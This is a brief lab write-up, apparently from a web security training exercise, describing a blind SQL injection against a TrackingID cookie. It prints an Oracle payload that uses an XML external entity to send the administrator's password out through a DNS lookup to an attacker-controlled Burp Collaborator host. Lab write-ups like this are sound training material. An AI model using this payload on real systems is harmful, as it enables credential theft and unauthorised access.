We were able to see the TrackingID cookie after refreshing the page. So we used the blind SQLi payload below to perform a DNS lookup and send the query response in the DNS body to the Burp Collaborator link we controlled:
x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.BURP-COL-URL/"> %remote;]>'),'/l') FROM dual--
After sending the request and polling using Burp Collaborator, we were able to see the DNS lookup with the password of the administrator user from a public IP as below:
We logged in as administrator using the password and solved the lab
